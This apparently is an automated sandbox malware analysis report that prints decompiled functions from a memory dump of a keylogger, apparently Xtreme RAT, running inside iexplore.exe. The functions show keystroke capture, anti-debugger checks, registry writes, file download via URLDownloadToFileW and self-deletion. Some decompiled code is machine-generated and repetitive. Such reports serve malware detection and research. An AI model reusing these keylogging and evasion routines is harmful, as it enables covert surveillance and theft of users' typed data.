						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C82F90, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
registry

C-Code - Quality: 100%

			E00C82F90(void* __eax, short* __edx, void* __eflags, int _a4, char* _a8) {
				void* _v8;
				void* _t17;
				short* _t18;
				char* _t22;

				_t22 = _a8;
				_t17 = 0;
				RegCreateKeyW(__eax, __edx,  &_v8);
				if(RegSetValueExW(_v8, _t18, 0, _a4, _t22, E00C82E48(_t22) + _t9) == 0) {
					_t17 = 1;
				}
				RegCloseKey(_v8);
				return _t17;
			}

0x00c82f99
0x00c82f9c
0x00c82fa4
0x00c82fc6
0x00c82fc8
0x00c82fc8
0x00c82fce
0x00c82fda

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

Strings

ServerStarted, xrefs: 00C82F93, 00C82FBA

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C89790, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30
time

C-Code - Quality: 100%

			E00C89790(short* __eax) {
				struct _SYSTEMTIME _v20;
				short* _t17;
				struct _SYSTEMTIME* _t18;

				_t17 = __eax;
				GetLocalTime(_t18);
				GetDateFormatW(0x800, 1,  &_v20, 0, _t17, 0xff);
				_t17[E00C82E48(_t17)] = 0x20;
				return GetTimeFormatW(0x800, 8,  &_v20, 0,  &(_t17[E00C82E48(_t17)]), 0xff);
			}

0x00c89794
0x00c89797
0x00c897b0
0x00c897bc
0x00c897e9

APIs

GetLocalTime.KERNEL32 ref: 00C89797
GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,5/3/2018 10:11:44 AM,000000FF), ref: 00C897B0
GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C897E0

Strings

5/3/2018 10:11:44 AM, xrefs: 00C897A1

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8861C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25
library

C-Code - Quality: 58%

			E00C8861C() {
				void* _t5;
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;

				_t5 = 0;
				_t6 = LoadLibraryA("kernel32.dll");
				if(_t6 != 0) {
					_t8 = GetProcAddress(_t6, "IsDebuggerPresent");
					_t7 = _t8;
					if(_t8 != 0) {
						_t5 =  *_t7();
					}
				}
				return _t5;
			}

0x00c88620
0x00c8862c
0x00c88630
0x00c8863d
0x00c8863f
0x00c88643
0x00c88647
0x00c88647
0x00c88643
0x00c8864f

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C88627
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent,kernel32.dll,?,00C8E07C,00000000,00000000,00C886B8,?,00C88A28), ref: 00C88638

Strings

kernel32.dll, xrefs: 00C88622
IsDebuggerPresent, xrefs: 00C88632

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C837C0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19
network

C-Code - Quality: 37%

			E00C837C0(void* __eax, WCHAR* __edx) {
				signed int _t4;
				void* _t6;
				WCHAR* _t8;

				_t8 = __edx;
				_t6 = __eax;
				_push(__eax);
				L00C837B8();
				_t4 = DeleteFileW(__edx);
				_push(0);
				_push(0);
				_push(_t8);
				_push(_t6);
				_push(0);
				L00C837B0();
				return _t4 & 0xffffff00 | _t4 == 0x00000000;
			}

0x00c837c2
0x00c837c4
0x00c837c6
0x00c837c7
0x00c837cd
0x00c837d2
0x00c837d4
0x00c837d6
0x00c837d7
0x00c837d8
0x00c837da
0x00c837e6

APIs

DeleteUrlCacheEntryW.WININET(local), ref: 00C837C7
DeleteFileW.KERNEL32(00320000,local,00000000,00C87C00,00000000,00C87D2A,?,00000000,00000000), ref: 00C837CD
URLDownloadToFileW.URLMON(00000000,local,00320000,00000000,00000000), ref: 00C837DA

Strings

local, xrefs: 00C837C1, 00C837C6, 00C837D7

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C82E70, Relevance: 6.1, APIs: 4, Instructions: 96
registry

C-Code - Quality: 74%

			E00C82E70(void* __eax, void* __ebx, char __ecx, char __edx, void* __esi, intOrPtr* _a4, char _a8) {
				char _v8;
				char _v12;
				void* _v16;
				int _v20;
				int _v24;
				intOrPtr _t72;
				signed int _t77;
				void* _t79;
				short* _t80;
				void* _t83;
				long _t86;

				_v12 = __ecx;
				_v8 = __edx;
				_t79 = __eax;
				_t63 = _a4;
				E00C81FB0( &_v8);
				E00C81FB0( &_v12);
				E00C81FB0( &_a8);
				_push(_t83);
				_push(0xc82f77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffec;
				E00C81BB4(_a4, _a8);
				if(RegOpenKeyExW(_t79, E00C81CF4(_v8), 0, 1,  &_v16) == 0) {
					_t80 = E00C81CF4(_v12);
					_t86 = RegQueryValueExW(_v16, _t80, 0,  &_v20, 0,  &_v24);
					if(_t86 == 0) {
						_t77 = _v24 >> 1;
						if(_t86 < 0) {
							asm("adc edx, 0x0");
						}
						E00C81F6C(_t63, _t77);
						RegQueryValueExW(_v16, _t80, 0,  &_v20, E00C81CF4( *_t63),  &_v24);
					}
					RegCloseKey(_v16);
				}
				if(E00C81F1C(0xc82f8c,  *_t63) > 0) {
					E00C81E40( *_t63, E00C81F1C(0xc82f8c,  *_t63) - 1, 1, E00C81F1C(0xc82f8c,  *_t63) - 1, _t63);
				}
				_pop(_t72);
				 *[fs:eax] = _t72;
				_push(E00C82F7E);
				E00C81B90( &_v12, 2);
				return E00C81B78( &_a8);
			}

APIs

Part of subcall function 00C81FB0: 75CF465A.OLEAUT32(?,?,?,00C82E8B,00C8E07C,?), ref: 00C81FBE

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EC5
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EE9
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 00C82F1A
RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C), ref: 00C82F23

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8313C, Relevance: 6.1, APIs: 4, Instructions: 76

C-Code - Quality: 54%

			E00C8313C(int __eax, void* __ebx, void* __esi) {
				void* _v8;
				struct _ITEMIDLIST* _v12;
				char _v16;
				intOrPtr* _t25;
				struct _ITEMIDLIST* _t29;
				void* _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				int _t44;
				void* _t46;
				void* _t47;
				intOrPtr _t48;

				_t46 = _t47;
				_t48 = _t47 + 0xfffffff4;
				_v16 = 0;
				_t44 = __eax;
				_push(_t46);
				_push(0xc83205);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48;
				E00C8238C( &_v16);
				_push(E00C8238C( &_v16));
				L00C83124();
				_t35 = 0;
				if(_v16 != 0) {
					_push(_t46);
					_push(0xc831e8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t48;
					if(E00C83118(SHGetSpecialFolderLocation(0, _t44,  &_v12)) != 0) {
						_t35 = VirtualAlloc(0, 0x208, 0x1000, 4);
						_push(_t35);
						_t29 = _v12;
						_push(_t29);
						L00C83134();
						asm("sbb eax, eax");
						if(_t29 + 1 == 0) {
							_t35 = 0;
						}
					}
					_v8 = _t35;
					_pop(_t41);
					 *[fs:eax] = _t41;
					_t25 = _v16;
					return  *((intOrPtr*)( *_t25 + 0x14))(_t25, _v12, E00C831EF);
				} else {
					_v8 = 0;
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(E00C8320C);
					return E00C8238C( &_v16);
				}
			}

0x00c8313d
0x00c8313f
0x00c83146
0x00c83149
0x00c8314d
0x00c8314e
0x00c83153
0x00c83156
0x00c8315c
0x00c83169
0x00c8316a
0x00c8316f
0x00c83175
0x00c8317e
0x00c8317f
0x00c83184
0x00c83187
0x00c8319d
0x00c831b2
0x00c831b4
0x00c831b5
0x00c831b8
0x00c831b9
0x00c831c1
0x00c831c6
0x00c831c8
0x00c831c8
0x00c831c6
0x00c831ca
0x00c831cf
0x00c831d2
0x00c831de
0x00c831e7
0x00c83177
0x00c83177
0x00c831f1
0x00c831f4
0x00c831f7
0x00c83204
0x00c83204

APIs

SHGetMalloc.SHELL32(00000000), ref: 00C8316A
SHGetSpecialFolderLocation.SHELL32(00000000,0000001A,?), ref: 00C83191
VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C831E8,?,00000000,00C83205,?,?), ref: 00C831AD
SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00C831B9

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C83B10, Relevance: 6.0, APIs: 4, Instructions: 49

C-Code - Quality: 30%

			E00C83B10(long __eax) {
				void* _v8;
				void* _v12;
				void* _t15;
				intOrPtr _t25;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t27 = _t29;
				_t30 = _t29 + 0xfffffff8;
				_v8 = 0;
				_v12 = OpenProcess(0x410, 0, __eax);
				if(_v12 == 0) {
					L5:
					return _v8;
				} else {
					_push(_t27);
					_push(0xc83b8b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t30;
					_v8 = VirtualAlloc(0, 0x208, 0x1000, 4);
					_push(0x104);
					_push(_v8);
					_push(0);
					_t15 = _v12;
					_push(_t15);
					L00C83B08();
					if(_t15 != 0) {
						_pop(_t25);
						 *[fs:eax] = _t25;
						_push(E00C83B92);
						return CloseHandle(_v12);
					} else {
						E00C81520();
						goto L5;
					}
				}
			}

APIs

OpenProcess.KERNEL32(00000410,00000000,0000017C), ref: 00C83B23
VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B4D
775C13F0.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B64
CloseHandle.KERNEL32(?), ref: 00C83B85

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C83218, Relevance: 6.0, APIs: 4, Instructions: 48
file

C-Code - Quality: 88%

			E00C83218(WCHAR* __eax, void* __edx, long _a4, intOrPtr _a8) {
				long _v8;
				void* _t13;
				void* _t15;
				void* _t16;

				_t15 = __edx;
				_t13 = 0;
				_t16 = CreateFileW(__eax, 0x40000000, 2, 0, 2, 0, 0);
				if(_t16 != 0xffffffff) {
					if(_a8 == 0 && _a4 == 0xffffffff) {
						SetFilePointer(_t16, 0, 0, 0);
					}
					WriteFile(_t16, _t15, _a4,  &_v8, 0);
					asm("sbb ebx, ebx");
					_t13 = _t13 + 1;
				}
				CloseHandle(_t16);
				return _t13;
			}

0x00c8321f
0x00c83221
0x00c83238
0x00c8323d
0x00c83243
0x00c83252
0x00c83252
0x00c83263
0x00c8326b
0x00c8326d
0x00c8326d
0x00c8326f
0x00c8327b

APIs

CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00C83263
CloseHandle.KERNEL32(00000000), ref: 00C8326F

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C897F4, Relevance: 6.0, APIs: 4, Instructions: 29
sleep

C-Code - Quality: 92%

			E00C897F4(WCHAR* _a4) {
				void* _t3;
				int _t5;
				WCHAR* _t6;
				WCHAR* _t7;

				_t6 = _a4;
				while(1) {
					_t7 = _t6;
					_t3 = E00C835B0(_t7);
					if(_t3 != 1) {
						break;
					}
					SetFileAttributesW(_t7, 0x80);
					_t5 = DeleteFileW(_t7);
					asm("sbb eax, eax");
					_t3 = _t5 + 1;
					if(_t3 != 1) {
						Sleep(0x3e8);
						continue;
					}
					break;
				}
				ExitProcess(0);
				return _t3;
			}

APIs

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89804
DeleteFileW.KERNEL32(?,?,00000080), ref: 00C8980A
Sleep.KERNEL32(000003E8,?,?,00000080), ref: 00C8981E
ExitProcess.KERNEL32(00000000,?,?,00000080), ref: 00C89832

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C83804, Relevance: 6.0, APIs: 4, Instructions: 23
windowsleep

C-Code - Quality: 100%

			E00C83804(struct tagMSG* __eax) {
				int _t6;
				MSG* _t7;

				_t7 = __eax;
				_t6 = 0;
				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
					_t6 = 1;
					TranslateMessage(_t7);
					DispatchMessageA(_t7);
				}
				Sleep(5);
				return _t6;
			}

0x00c83806
0x00c83808
0x00c8381a
0x00c8381c
0x00c8381f
0x00c83825
0x00c83825
0x00c8382c
0x00c83835

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00C83813
TranslateMessage.USER32 ref: 00C8381F
DispatchMessageA.USER32 ref: 00C83825
Sleep.KERNEL32(00000005,00000001,?,00C83842), ref: 00C8382C

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C81CD8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26

C-Code - Quality: 29%

			E00C81CD8(void* __eax, void* __ecx, intOrPtr __edx) {
				void* _t5;
				intOrPtr* _t6;
				void* _t7;
				intOrPtr _t19;
				void* _t21;
				void* _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr _t32;
				intOrPtr* _t34;

				_t23 = __edx;
				_t21 = __ecx;
				_push(__ecx);
				asm("repne scasw");
				if(0 == 0) {
					__ecx =  !__ecx;
				}
				_pop(_t5);
				_t22 = _t21 + _t5;
				_pop(_t6);
				if(_t22 == 0) {
					_t24 =  *_t6;
					if(_t24 != 0) {
						 *_t6 = 0;
						_push(_t6);
						L00C810A0();
						_t7 = _t24;
						return _t7;
					}
					return _t6;
				} else {
					_push(_t6);
					_push(_t22);
					_push(_t23);
					L00C81090();
					if(_t6 == 0) {
						_t23 =  *_t34;
						_t32 = _t23;
						_t19 = 1;
						if( *0xc8c004 != 0) {
							 *0xc8c004();
						}
						if(_t19 != 0) {
							if(_t19 <= 0x18) {
								_t2 = _t19 + 0xc8b050; // 0xc9c8cccb
								_t19 =  *_t2;
							}
						} else {
							_t19 =  *((intOrPtr*)(E00C824B8() + 4));
						}
						return E00C81180(_t32);
					} else {
						_pop(_t27);
						_push( *_t27);
						 *_t27 = _t6;
						L00C810A0();
						return _t6;
					}
				}
			}

APIs

75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

Strings

%DEFAULTBROWSER%, xrefs: 00C81C76, 00C81C85

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C88804, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18

C-Code - Quality: 100%

			E00C88804() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\SICE", 0xc0000000, 3, 0, 3, 0x80, 0);
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}

0x00c88805
0x00c8881e
0x00c88826
0x00c88829
0x00c8882e
0x00c8882e
0x00c88833

APIs

CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C8881E
CloseHandle.KERNEL32(00000000), ref: 00C88829

Strings

\\.\SICE, xrefs: 00C88819

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C88840, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18

C-Code - Quality: 100%

			E00C88840() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\NTICE", 0xc0000000, 3, 0, 3, 0x80, 0);
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}

0x00c88841
0x00c8885a
0x00c88862
0x00c88865
0x00c8886a
0x00c8886a
0x00c8886f

APIs

CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C8885A
CloseHandle.KERNEL32(00000000), ref: 00C88865

Strings

\\.\NTICE, xrefs: 00C88855

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8387C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
thread

C-Code - Quality: 75%

			E00C8387C(void* __eax) {
				void* _t5;
				void* _t7;

				_t7 = __eax;
				TerminateThread(__eax, 1);
				asm("sbb ebx, ebx");
				CloseHandle(_t7);
				return _t5 + 1;
			}

0x00c8387e
0x00c83883
0x00c8388b
0x00c8388f
0x00c83898

APIs

TerminateThread.KERNEL32(00000000,00000001,?,XtremeKeylogger,00C878B4,00100164,0000C1F3,00000000,00000000,000000D0,00000000,00000000,00000002,00460000,00000007,000000D0), ref: 00C83883
CloseHandle.KERNEL32(00000000), ref: 00C8388F

Strings

XtremeKeylogger, xrefs: 00C8387C

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C81C6C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13

C-Code - Quality: 56%

			E00C81C6C(signed int __eax, void* __ecx, void* __edx) {
				void* _t4;
				signed char _t15;
				void* _t18;
				void* _t19;
				void* _t23;

				_t18 = __edx;
				_t3 = __eax;
				if(__ecx == 0) {
					_t19 =  *__eax;
					if(_t19 != 0) {
						 *__eax = 0;
						_push(__eax);
						L00C810A0();
						_t4 = _t19;
						return _t4;
					}
					return __eax;
				} else {
					_push(__eax);
					_push(__ecx);
					_push(__edx);
					L00C81090();
					if(__eax == 0) {
						__eax = __eax & 0x0000007f;
						__edx =  *__esp;
						_t23 = _t18;
						_t15 = _t3 & 0x0000007f;
						if( *0xc8c004 != 0) {
							 *0xc8c004();
						}
						if(_t15 != 0) {
							if(_t15 <= 0x18) {
								_t2 = _t15 + 0xc8b050; // 0xc9c8cccb
								_t15 =  *_t2;
							}
						} else {
							_t15 =  *(E00C824B8() + 4);
						}
						return E00C81180(_t23);
					} else {
						_pop(__edx);
						_push( *__edx);
						 *__edx = __eax;
						L00C810A0();
						return __eax;
					}
				}
			}

APIs

75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

Strings

%DEFAULTBROWSER%, xrefs: 00C81C76, 00C81C85

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Analysis Process: 358saxio.exe PID: 3884 Parent PID: 3644

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.7%
Total number of Nodes:	1738
Total number of Limit Nodes:	64

Executed Functions

Function 00485828, Relevance: 1.5, Instructions: 1503
Crypto

C-Code - Quality: 59%

			E00485828(void* _a44, void* _a60, void* _a68, intOrPtr _a1739849788) {
				char _v3;
				intOrPtr _v58720196;
				intOrPtr _v1929379780;
				void* _v2073820860;
				intOrPtr* _t447;
				void* _t448;
				signed int _t449;
				intOrPtr* _t451;
				signed int* _t452;
				signed int _t453;
				signed int _t455;
				intOrPtr* _t591;
				intOrPtr* _t593;
				void* _t594;
				signed int* _t595;
				intOrPtr _t616;
				void* _t617;
				signed char _t618;
				intOrPtr _t635;
				intOrPtr _t636;
				signed char _t637;
				signed int _t648;
				void* _t649;
				void* _t651;
				void* _t656;
				void* _t659;
				signed int _t663;
				signed int _t664;
				signed int _t666;
				signed int _t667;
				signed int _t668;
				void* _t694;
				void* _t695;
				void* _t696;

				E00406BB4(0x484000);
				_t593 =  *0x4885f4; // 0x48c5b0
				E0045D59C();
				_t635 =  *0x480800; // 0x48084c, executed
				E0045D5B4( *_t593, _t635);
				_t636 =  *0x4803a8; // 0x4803f4, executed
				E0045D5B4( *_t593, _t636);
				_t616 =  *0x488590; // 0x48c980
				_t637 =  *0x480598; // 0x4805e4, executed
				E0045D5B4( *_t593, _t637); // executed
				 *((char*)( *_t593 + 0x5b)) = 0;
				_t447 = E0045D634( *_t593, _t593, _t648, _t659);
				_pop(_t594);
				E00404C94();
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
